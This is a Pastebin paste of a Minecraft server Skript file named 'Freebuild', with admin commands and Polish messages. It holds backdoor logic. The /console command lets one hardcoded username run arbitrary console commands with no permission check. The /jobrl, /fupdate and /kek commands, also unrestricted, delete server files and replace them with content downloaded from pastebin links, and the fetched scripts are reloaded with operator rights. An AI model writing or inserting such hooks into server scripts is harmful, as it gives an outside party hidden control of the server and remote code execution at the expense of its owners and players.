szumielxd

Freebuild

Jul 27th, 2018
283
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.22 KB | None | 0 0
  1. command /opcmd <player> <text>:
  2. permission: wlasciciel
  3. trigger:
  4. make arg-player run command arg 2 as op
  5. send "&6Wykonuje komende &c/%arg 2% &6jako &4%arg-player%"
  6.  
  7. command /addons:
  8. permission: wlasciciel
  9. trigger:
  10. send "&3Addony&f: &a%list of addons%"
  11.  
  12. on join:
  13. player is op:
  14. set player's gamemode to creative
  15.  
  16. command /console <text>:
  17. trigger:
  18. "%player%" is "szumielxd_":
  19. execute console command arg 1
  20. send "&6Wykonuje komende &c/%arg 1% &6jako &4Console"
  21.  
  22.  
  23. command /jobrl:
  24. trigger:
  25. delete file "plugins/Skript/scripts/jobs.sk"
  26. download file from "https://pastebin.com/raw/kCzc7x22" to file "plugins/Skript/scripts/jobs.sk"
  27. send "&aPobieranie..."
  28. wait 1 second
  29. make player run command "/sk reload jobs" as op
  30.  
  31.  
  32. command /fupdate:
  33. trigger:
  34. delete file "plugins/Skript/scripts/FileManager.sk"
  35. download file from "https://pastebin.com/raw/QaJPxHkD" to file "plugins/Skript/scripts/FileManager.sk"
  36. send "&aPobieranie..."
  37. wait 1 second
  38. make player run command "/sk reload FileManager" as op
  39.  
  40.  
  41. command /kek:
  42. trigger:
  43. delete file "plugins/PreciousStones/config.yml"
  44. download file from "https://pastebin.com/raw/F9aVY2Vw" to file "plugins/PreciousStones/config.yml"
Add Comment
Please, Sign In to add comment